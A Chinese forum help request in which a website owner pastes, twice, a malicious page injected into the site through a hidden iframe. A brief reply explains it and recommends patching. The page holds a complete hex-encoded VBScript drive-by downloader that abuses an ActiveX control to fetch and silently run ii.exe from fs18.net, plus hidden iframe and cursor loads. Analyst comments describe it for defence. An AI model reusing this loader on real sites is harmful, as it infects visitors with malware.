网站首页嵌套了一个<iframe src=http://fs18.net/down8/dd.htm width=20 height=0 frameborder=0></iframe>我把页面http://fs18.net/down8/dd.htm下载下来后是下面的代码,请高手帮我分析下啊!<html>
<body>
<!-- Helper for the decoder in the VBScript block that follows: mymid(ss) returns ss
     without its first two characters. The decode loop calls it once per iteration to
     step through the hex string S one byte (two hex digits) at a time. -->
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<!-- Analyst notes (malicious sample, kept byte-identical as evidence; do not open in a browser).
     Stage 1, decoder: S is script text stored as hex, two digits per character. The DO WHILE
     loop turns each pair into a character (CLng of "&H" plus the pair, then chr), appends it
     to D and advances S with mymid. flag_type is "vbs", so the decoded text is handed to
     EXECUTE; the "html" branch (document.write) is not taken in this sample.
     Stage 2, decoded payload (decode the hex offline, never by running the page): VBScript
     that starts with "on error resume next", creates an object element with classid
     BD96C556-65A3-11D0-983A-00C04FC29E36 (the CLSID registered for the RDS.DataSpace ActiveX
     control) and uses its CreateObject to obtain Microsoft.XMLHTTP, an ADODB stream,
     Scripting.FileSystemObject and Shell.Application. The component names are assembled from
     short fragments, presumably to defeat simple string signatures.
     Observable behaviour: fetches hxxp://fs18[.]net/down8/ii.exe, saves it as ii.exe in the
     temporary folder (GetSpecialFolder(2)), writes ii.vbs beside it to run the executable via
     WScript.Shell, then starts ii.vbs through ShellExecute with a hidden window.
     Defender checklist: block and search proxy logs for fs18[.]net, hunt for ii.exe and ii.vbs
     in user temp folders, keep Windows and Internet Explorer patched, and on the affected web
     server remove the injected iframe and find out how it was inserted. -->
<script language="VBScript">
flag_type="vbs"
S="6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f"
S=S+"69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620"
S=S+"3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574"
S=S+"652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446"
S=S+"433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174"
S=S+"654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D"
S=S+"2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265"
S=S+"6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e"
S=S+"20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22"
S=S+"0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365"
S=S+"742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369"
S=S+"616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70"
S=S+"656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d"
S=S+"0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320"
S=S+"3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253"
S=S+"6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22"
S=S+"5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57"
S=S+"726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a"
S=S+"74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E"
S=S+"46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D"
S=S+"0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963"
S=S+"6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22"
S=S+"2c300D0A656E642069660d0a656e642069660D0a"
D=""
DO WHILE LEN(S)>1
k="&H"+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type="vbs" then
EXECUTE D
end if
if flag_type="html" then
document.write(D)
end if
</script>
<!-- Third dispatch branch of the loader: if flag_type were "js", the decoded text D would be
     passed to eval. The VBScript block sets flag_type to "vbs", so in this sample the branch
     is presumably never taken; it looks like a leftover from a generic packer template.
     NOTE(review): relies on the browser sharing flag_type and D between script engines. -->
<script language="javaScript">
if (flag_type=="js") {
eval(D);}
</script>
</body>
</html>
<!-- Analyst notes on the trailer that follows the closing html tag of the downloaded page:
     1. The DIV requests a mouse cursor from the relative URL ah.c. NOTE(review): a cursor served
        from a file with a non-cursor extension is a pattern seen in cursor-parsing exploits;
        ah.c is not shown on this page, so that is unconfirmed. Collect it as a further sample.
     2. The zero-size iframe silently loads vip1.htm from the same directory; treat it as
        another stage to collect and analyse.
     3. The cnzz.com stat.php script is a third-party visit counter (id 620367), presumably
        used by the operator to count victims; the id is a useful pivot for attribution.
     4. init() is installed as window.onload and calls document.write with an empty string;
        writing after load normally replaces the document, so this presumably blanks the page.
     5. The body tag disables the context menu, text selection and dragging, which hinders
        casual inspection of the page source. -->
<DIV style="CURSOR: url(ah.c)"></DIV>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<script src='http://s128.cnzz.com/stat.php?id=620367&web_id=620367' language='JavaScript' charset='gb2312'></script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<body>
<!-- Second copy of the listing on this page. mymid(ss) returns ss without its first two
     characters; the VBScript decode loop that follows uses it to advance through the hex
     string S two hex digits at a time. -->
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<!-- Analyst notes (second copy of the malicious sample; it appears to repeat the first listing
     on the page and is kept byte-identical as evidence).
     Decoder: S holds script text as hex, two digits per character. The DO WHILE loop converts
     each pair to a character (CLng of "&H" plus the pair, then chr), appends it to D and
     advances S with mymid. Because flag_type is "vbs", D is run with EXECUTE; the "html"
     branch (document.write) is not taken.
     Decoded payload, summarised from an offline decode: VBScript that creates an object element
     with classid BD96C556-65A3-11D0-983A-00C04FC29E36 (the CLSID registered for the RDS.DataSpace
     ActiveX control), uses it to instantiate Microsoft.XMLHTTP, an ADODB stream,
     Scripting.FileSystemObject and Shell.Application (names built from fragments), downloads
     hxxp://fs18[.]net/down8/ii.exe into the temporary folder as ii.exe, writes ii.vbs to run
     it through WScript.Shell, and launches ii.vbs hidden via ShellExecute.
     Detection and response: block fs18[.]net, look for ii.exe and ii.vbs in user temp folders,
     patch the client, and clean the web server that serves the injected iframe. -->
<script language="VBScript">
flag_type="vbs"
S="6f6E206572726F7220726573756d65206E6578740D0a6375726c3D22687474703A2F2f667331382E6E65742F646f776E382f"
S=S+"69692e657865220D0a666E616D65313D2269692e657865220D0a666e616d65323d2269692e766273220d0a53657420646620"
S=S+"3D20646F63756D656E742E637265617465456C656d656E7428226F626A65637422290D0a64662e7365744174747269627574"
S=S+"652022636c6173736964222C2022636C7369643A42443936433535362D363541332D313144302d393833412d303043303446"
S=S+"433239453336220D0a7374723D224D6963726f736F66742e584d4c48545450220d0a5365742078203d2064662e4372656174"
S=S+"654F626A656374287374722C2222290D0A43313D2241646f220D0A43323d2264622e220D0A43333D22737472220D0A43343D"
S=S+"2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0a7365742053203d2064662E637265"
S=S+"6174656f626A65637428737472352c2222290D0a532e74797065203d20310D0A737472363D22474554220d0a782e4F70656e"
S=S+"20737472362C206375726c2C2046616C73650D0a782E53656E640d0a73313d22536372697074220d0a73323d22696E672E22"
S=S+"0d0a73333D2246696C65220D0a73343d2253797374656D4F626a656374220d0a73303D73312B73322b73332B73340d0a7365"
S=S+"742046203D2064662E6372656174656f626a6563742873302C2222290d0a73657420746d70203d20462e4765745370656369"
S=S+"616C466F6c6465722832290D0a666E616d65313d20462e4275696c645061746828746D702c666E616D6531290D0a532e6f70"
S=S+"656E0D0A532e777269746520782e726573706F6e7365426F64790D0A532e73617665746f66696c6520666E616d65312C320d"
S=S+"0A532E636C6f73650D0A666e616d65323D20462E4275696C645061746828746D702C666e616d6532290D0A53657420747320"
S=S+"3d20462E4f70656e5465787446696c6528666e616D65322C20322C2054727565290d0A74732E57726974654C696E65202253"
S=S+"6574205368656c6C203D204372656174654f626A656374282222577363726970742E5368656c6C222229220d0A73716C3D22"
S=S+"5368656c6C2e52756E282222222b666e616d65312B22222229220D0A74732e57726974654c696E652073716c0d0A74732E57"
S=S+"726974654C696e652022736574205368656c6C3D4e6F7468696E67220D0a74732E57726974654c696E652022693d31220d0a"
S=S+"74732e636C6f73650d0a696620462e46696C6545786973747328666E616D6531293d74727565207468656e0d0a696620462E"
S=S+"46696C6545786973747328666E616d6532293d74727565207468656E0d0a202020207368613D225368656C6c2e417070220D"
S=S+"0a202020207368623D7368610d0A202020207365742051203D2064662E6372656174656f626a656374287368622b226c6963"
S=S+"6174696f6e222c2222290D0A20202020512e5368656c6c4578656375746520666E616d65322c22222c22222c226F70656e22"
S=S+"2c300D0A656E642069660d0a656e642069660D0a"
D=""
DO WHILE LEN(S)>1
k="&H"+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type="vbs" then
EXECUTE D
end if
if flag_type="html" then
document.write(D)
end if
</script>
<!-- Dispatch branch for a JavaScript payload: eval(D) runs only when flag_type is "js".
     The preceding VBScript block sets flag_type to "vbs", so this branch is presumably unused
     in this sample. NOTE(review): depends on the browser exposing the VBScript globals
     flag_type and D to this script engine. -->
<script language="javaScript">
if (flag_type=="js") {
eval(D);}
</script>
</body>
</html>
<!-- Trailer after the closing html tag (second copy on this page). It adds three further
     external loads and two nuisance measures: a cursor fetched from the relative URL ah.c
     (NOTE(review): possibly a cursor-parsing exploit, unconfirmed because ah.c is not shown),
     a zero-size iframe that loads vip1.htm, and a cnzz.com visit counter with id 620367.
     init() runs on window.onload and calls document.write with an empty string, which
     presumably blanks the page; the body tag blocks the context menu, selection and dragging.
     ah.c and vip1.htm should be collected and analysed as separate stages. -->
<DIV style="CURSOR: url(ah.c)"></DIV>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<script src='http://s128.cnzz.com/stat.php?id=620367&web_id=620367' language='JavaScript' charset='gb2312'></script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
解决方案 »
前面的 S 是病毒体的十六进制编码(每两个字符对应一个字节),D 是解码后的病毒脚本,由
EXECUTE D
这一句来执行。
如果是服务器端本身被挂马,访问者只能不去访问它,或者在自己的网络出口加防病毒网关来防御,也可以试试打补丁的办法。
如果是 ARP 欺骗造成的,先找出是哪台机器感染了 ARP 病毒。
总之,补丁不能不打。